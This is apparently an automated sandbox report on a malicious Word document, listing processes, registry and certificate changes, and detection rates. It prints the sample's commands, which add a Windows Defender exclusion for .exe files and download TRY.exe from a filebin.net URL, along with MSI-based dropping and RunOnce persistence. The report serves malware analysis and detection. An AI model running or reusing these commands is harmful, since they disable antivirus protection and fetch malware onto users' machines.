Source: C:\Windows\SysWOW64\icacls.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\icacls.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\expand.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\expand.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\icacls.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\icacls.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docVirustotal: Detection: 37%
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docReversingLabs: Detection: 24%
Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\SysWOW64\icacls.exeConsole Write: .................................3:.....(.P.....................<...............................................................................Jump to behavior
Source: C:\Windows\SysWOW64\icacls.exeConsole Write: .................................3:.....(.P.....................<.......................................................v.......................Jump to behavior
Source: C:\Windows\System32\cmd.exeConsole Write: ...................J....................................@c!J..... .......#...............(:w.......J....."..............T.......q(.w............Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.................r...............r.......m.....`Io.......bw.....................Kv.....................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............V.yk......w...............S.............}.dw.... .w.....0.~...............Z.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............6.yk......Z...............S.............}.dw......w.....0.~.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............V.yk......w...............S.............}.dw.... .w.....0.~...............Z.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............6.yk......................S.............}.dw......w.....0.~.....................|.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............V.yk....8.w...............S.............}.dw......w.....0.~...............Z.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.S.............}.dw......w.....0.~.............H.Z.....".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............V.yk......w...............S.............}.dw......w.....0.~...............Z.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............6.yk......Z...............S.............}.dw....0.w.....0.~.....................b.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............V.yk......w...............S.............}.dw....h.w.....0.~...............Z.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............6.yk......Z...............S.............}.dw....0.w.....0.~.............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............V.yk......w...............S.............}.dw....h.w.....0.~...............Z.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.dw......w.....0.~.............H.Z.....2.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............V.yk....P.w...............S.............}.dw......w.....0.~...............Z.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............6.yk......Z...............S.............}.dw......w.....0.~.....................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............V.yk......w...............S.............}.dw....H.w.....0.~...............Z.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .......6.yk......Z...............S.............}.dw......w.....0.~.............H.Z.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................V.yk......w...............S.............}.dw......w.....0.~...............Z.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.................j...............j.......e.....`Ig.......bw.....................Kn.....................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............6.ok......t.............................}.dw......t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../.................ok......L.............................}.dw....`.t.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w..../...............6.ok......t.............................}.dw......t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;.................ok......L.............................}.dw......t.....0.......................~.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....;...............6.ok......t.............................}.dw....8.t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.8...............}.dw....H.t.....0...............h.L.....".......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....G...............6.ok......t.............................}.dw......t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S.................ok......L.............................}.dw....H.t.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....S...............6.ok......t.............................}.dw......t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._.......T.R.Y...e.x.e.....L.............................}.dw....0.t.....0...............h.L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w...._...............6.ok......t.............................}.dw....h.t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k.................ok......L.............................}.dw....0.t.....0...............................................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....k...............6.ok......t.............................}.dw....h.t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w....... . . .o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.......t.....0...............h.L.....4.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....w...............6.ok....P.t.............................}.dw......t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................ok......L.............................}.dw......t.....0.......................l.......................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................6.ok......t.............................}.dw....H.t.....0.................L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w............ .........ok......L.............................}.dw......t.....0...............h.L.............................Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................6.ok......t.............................}.dw......t.....0.................L.............................Jump to behavior
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe"
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeProcess created: C:\Windows\System32\cmd.exe cmd /c thai.bat
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOW
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding A7515E85DB42A85129F32A151C15AD96Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGHJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* filesJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe" Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)LOWJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeProcess created: C:\Windows\System32\cmd.exe cmd /c thai.batJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Set-MpPreference -ExclusionExtension ".exe"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "Invoke-WebRequest -uri https://filebin.net/rf43v6qzghbj7h7b/TRY.exe -o TRY.exe"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61B44 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,9_2_000000013FB61B44
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docOLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$543_0008858249_FWDOUTSTANDING_20200604.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR582D.tmpJump to behavior
Source: classification engineClassification label: mal76.expl.winDOC@19/23@5/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB665B0 GetCurrentDirectoryA,SetCurrentDirectoryA,GetLastError,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,GetLastError,FormatMessageA,SetCurrentDirectoryA,9_2_000000013FB665B0
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB64478 CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,GetLastError,FormatMessageA,9_2_000000013FB64478
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB65940 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,#20,#22,#23,FreeResource,SendMessageA,9_2_000000013FB65940
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeProcess created: C:\Windows\System32\cmd.exe cmd /c thai.bat
Source: C:\Windows\SysWOW64\msiexec.exeFile written: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\msiwrapper.iniJump to behavior
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docOLE document summary: title field not present or empty
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docOLE document summary: author field not present or empty
Source: 12543_0008858249_FWDOUTSTANDING_20200604.docOLE document summary: edited time not present or 0
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~DFC2FF7A9553E7F48E.TMP.0.drOLE document summary: title field not present or empty
Source: ~DFC2FF7A9553E7F48E.TMP.0.drOLE document summary: author field not present or empty
Source: ~DFC2FF7A9553E7F48E.TMP.0.drOLE document summary: edited time not present or 0
Source: MSI5B5A.tmp.2.drOLE document summary: edited time not present or 0
Source: 535fae.ipi.2.drOLE document summary: title field not present or empty
Source: 535fae.ipi.2.drOLE document summary: author field not present or empty
Source: 535fae.ipi.2.drOLE document summary: edited time not present or 0
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\msiexec.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
Source: MSI5B5A.tmp.2.drInitial sample: OLE summary template = Intel;1033
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: wextract.pdb source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: wextract.pdbGCTL source: TRY.exe, 00000009.00000000.925012433.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, TRY.exe, 00000009.00000002.945782546.000000013FB69000.00000002.00000001.01000000.00000005.sdmp, 79bd875a22ddb24abfa2594fbd40eccf.tmp.7.dr, MSI5B5A.tmp.2.dr, files.cab.4.dr
Source: Binary string: C:\ss2\Projects\MsiWrapper\MsiCustomActions\Release\MsiCustomActions.pdb source: MSI5B5A.tmp.2.dr, MSI9F1.tmp.2.dr
Source: MSI5B5A.tmp.2.drInitial sample: OLE summary keywords = Installer
Source: MSI5B5A.tmp.2.drInitial sample: OLE summary subject = Internet Explorer - UNREGISTERED - Wrapped using MSI Wrapper from www.exemsi.com
Source: ~WRF{1B1DF0C8-9DAA-4EF5-BAF3-5F56FA2C5B3B}.tmp.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB61C38 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,9_2_000000013FB61C38
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exe (copy)Jump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F1.tmpJump to dropped file
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\$dpx$.tmp\79bd875a22ddb24abfa2594fbd40eccf.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9F1.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeCode function: 9_2_000000013FB615F8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,9_2_000000013FB615F8
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Windows\Logs\DPX\setupact.logJump to behavior
Source: C:\Windows\SysWOW64\expand.exeFile created: C:\Windows\Logs\DPX\setuperr.logJump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\files\TRY.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0Jump to behavior
Source: C:\Windows\System32\msiexec.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-58b84a1d-9a66-4aee-8a43-feb206e089b1\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
Source: C:\Windows\System32\msiexec.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
